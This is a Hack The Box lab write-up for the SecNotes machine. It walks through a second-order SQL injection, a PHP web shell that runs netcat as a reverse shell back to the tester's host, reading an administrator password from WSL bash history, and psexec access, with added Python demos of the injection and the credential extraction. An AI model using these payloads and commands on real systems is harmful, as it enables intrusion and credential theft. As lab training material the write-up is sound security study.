SecNotes

Overview

SecNotes is a vulnerable machine from Hack The Box. Initial access comes from basic web enumeration plus a second-order SQL injection: the username chosen at registration is later concatenated into the query that lists a user's notes, so a crafted username exposes other users' notes, one of which holds SMB credentials. The foothold is gained by writing a PHP file and a netcat binary into a writable SMB share that backs the web site on port 8808, then requesting the PHP file to get a reverse shell. Privilege escalation uses the Windows Subsystem for Linux on the host: the bash history inside WSL records the administrator password, which gives an admin shell over psexec.

Nmap Scan

nmap -T3 -Pn 10.10.10.97 -vvv

  • 80/tcp open http syn-ack
  • 445/tcp open microsoft-ds syn-ack
  • 8808/tcp open ssports-bcast syn-ack

OS version: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)

Basic Enumeration

Nothing comes up with smbclient as an anonymous (guest) session; we likely need real credentials. Meanwhile we can look at the web page and run web enumeration such as nikto and gobuster against both port 80 and port 8808 (8808 is also an HTTP service, despite the nmap service name).

Gobuster gives us a fair number of web pages to check out:

```text
/auth.php        (Status: 500) [Size: 1208]
/contact.php     (Status: 302) [Size: 0] [--> login.php]
/Contact.php     (Status: 302) [Size: 0] [--> login.php]
/DB.php          (Status: 500) [Size: 1208]
/db.php          (Status: 500) [Size: 1208]
/home.php        (Status: 302) [Size: 0] [--> login.php]
/Home.php        (Status: 302) [Size: 0] [--> login.php]
/login.php       (Status: 200) [Size: 1223]
/Login.php       (Status: 200) [Size: 1223]
/logout.php      (Status: 302) [Size: 0] [--> login.php]
/register.php    (Status: 200) [Size: 1569]
```

The web service runs PHP (PHP/7.2.7, as reported by the server), which matters later: a PHP file we can place in the web root will be executed when requested.

  • The login portal lets us register. We can test for SQL injection by registering a user whose name is itself a SQL fragment, 'OR 1 OR' (the single quotes are part of the username). Registration and login accept it without complaint.
  • Signing in as this user, the notes page unexpectedly shows every user's notes. The stored username is being concatenated unescaped into the query that selects notes by owner, so the WHERE clause becomes username = '' OR 1 OR '' and is true for every row: a second-order SQL injection, where the payload is stored safely and only explodes when it is read back.
  • One of the other users' notes contains credentials: tyler / 92g!mA8BGjOirkL%OG*&
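
The behaviour above, as an added example that is not part of the original writeup or the SecNotes application: a small in-memory stand-in (sqlite3 instead of the box's MySQL, with constructed sample notes) where register.php and login.php are parameterised but the assumed home.php builds its query by string concatenation. Registering the username 'OR 1 OR' and logging in returns everyone's notes from the vulnerable query and nothing from the parameterised one.

```python
import sqlite3

# Constructed sample data for the demo (not the real SecNotes database).
SAMPLE_NOTES = [
    ("tyler", "new-site creds: tyler / <password>"),
    ("alice", "dentist on friday"),
    ("bob", "renew the certificate"),
]

# The username registered on the box: the quotes are part of the name.
INJECTED_USERNAME = "' OR 1 OR '"


def setup_db():
    """In-memory stand-in for the notes database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("CREATE TABLE notes (username TEXT, body TEXT)")
    for owner, body in SAMPLE_NOTES:
        conn.execute("INSERT INTO users VALUES (?, ?)", (owner, "secret"))
        conn.execute("INSERT INTO notes VALUES (?, ?)", (owner, body))
    conn.commit()
    return conn


def register(conn, username, password):
    """register.php as assumed here: parameterised, so the payload is stored verbatim."""
    conn.execute("INSERT INTO users VALUES (?, ?)", (username, password))
    conn.commit()


def login(conn, username, password):
    """login.php as assumed here: also parameterised; returns the stored username
    that the application then keeps in the session."""
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


def home_notes_vulnerable(conn, session_user):
    """home.php as assumed here: trusts the session username and concatenates it.
    With session_user = ' OR 1 OR ' the clause becomes
    username = '' OR 1 OR '' which is true for every row (second-order injection)."""
    sql = "SELECT body FROM notes WHERE username = '" + session_user + "'"
    return [body for (body,) in conn.execute(sql)]


def home_notes_safe(conn, session_user):
    """The same query with a bound parameter: the username is data, not SQL."""
    rows = conn.execute("SELECT body FROM notes WHERE username = ?", (session_user,))
    return [body for (body,) in rows]


if __name__ == "__main__":
    db = setup_db()
    register(db, INJECTED_USERNAME, "pw")
    me = login(db, INJECTED_USERNAME, "pw")
    print("vulnerable home.php:", home_notes_vulnerable(db, me))
    print("parameterised home.php:", home_notes_safe(db, me))
```

The point of the split into three functions is that the first two sinks are safe; only the later read of a value the application now trusts is exploitable, which is why input validation at registration alone is not a fix.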

Foothold

Using the credentials we found, we can now list the SMB shares and see a share named new-site that we can write to:

```text
Disk             Permissions     Comment
----             -----------     -------
ADMIN$           NO ACCESS       Remote Admin
C$               NO ACCESS       Default share
IPC$             READ ONLY       Remote IPC
new-site         READ, WRITE
```
  • With write access we can put files onto the machine. Uploading nc64.exe alone is not enough: nothing executes it. The new-site share, however, is the web root of the site on port 8808, and that site runs PHP, so a small PHP file placed next to nc64.exe will run the binary when we request the page.
```php
<?php
// rev1.php: run the nc64.exe uploaded to the same share, connecting back to our listener
system('nc64.exe -e cmd.exe 10.10.16.3 5555');
?>
```
  • After putting both files into the share, the file is reachable at http://10.10.10.97:8808/rev1.php. With a netcat listener running on port 5555 on our side, requesting that page gives us a reverse shell.
  • This has to be done in quick succession: files in the share get cleared every few minutes, so if the request returns 404 the files must be re-uploaded and the page requested again. We now have access to user.txt:

User

Local Enumeration

Bringing over tools such as winPEAS did not work; the system AV blocked them. After some manual checks on the host we find that it has the Windows Subsystem for Linux installed.

  • The WSL bash.exe launcher is found under the WinSxS directory.
  • https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#windows-subsystem-for-linux-wsl

From here, we can run that bash.exe and drop into the Linux subsystem.

Privilege Escalation

We now have a Linux shell inside WSL on the host. It is not a proper tty and is unstable to use interactively, so we upgrade it with: python -c 'import pty; pty.spawn("/bin/bash")'

  • While we are in this shell we can poke around to see what is here. Checking the bash history (~/.bash_history) gives us the administrator credentials: smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$ (in smbclient's -U argument the % separates the username from the password, so this line records the administrator password in clear text)

  • With that password, psexec gives us a shell as administrator: impacket-psexec 'administrator:u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97
  • We can now read root.txt:

Root
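
The history check above, as an added example that is not part of the original writeup: a small parser that pulls user/password pairs out of smbclient lines in a bash history, splitting each -U (or --user=) value at the first %, and skipping lines where the password was prompted for instead. The sample history is constructed, modelled on the line the writeup found; the parsing of -U, -Uuser%pass and --user= follows smbclient's documented syntax, everything else is the example's own.

```python
import shlex
import sys

# Constructed sample ~/.bash_history; only the quoted smbclient line carries a password.
SAMPLE_HISTORY = r"""ls -la
cd /mnt/c/Users
smbclient -L 127.0.0.1 -N
smbclient -U administrator \\\\127.0.0.1\\c$
smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$
exit
"""


def extract_smbclient_credentials(history_text):
    """Return (user, password) pairs from smbclient invocations that embed the
    password in -U user%pass, -Uuser%pass or --user=user%pass.
    A bare -U user (password prompted interactively) yields nothing."""
    found = []
    for line in history_text.splitlines():
        if "smbclient" not in line:
            continue
        try:
            tokens = shlex.split(line)  # honours the shell quoting around the credential
        except ValueError:  # unbalanced quotes in a half-typed command
            continue
        for i, tok in enumerate(tokens):
            if tok == "-U" and i + 1 < len(tokens):
                spec = tokens[i + 1]
            elif tok.startswith("-U") and len(tok) > 2:
                spec = tok[2:]
            elif tok.startswith("--user="):
                spec = tok[len("--user="):]
            else:
                continue
            if "%" in spec:
                user, _, password = spec.partition("%")  # first % only
                found.append((user, password))
    return found


if __name__ == "__main__":
    # Usage: python3 history_creds.py [path to .bash_history]; defaults to the sample.
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HISTORY
    for user, password in extract_smbclient_credentials(text):
        print(f"{user}:{password}")
```

Splitting at the first % is deliberate: smbclient does the same, so a password that itself contains % is recovered intact, and a line with -U but no % is correctly treated as not leaking anything.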

This post is licensed under CC BY 4.0 by the author.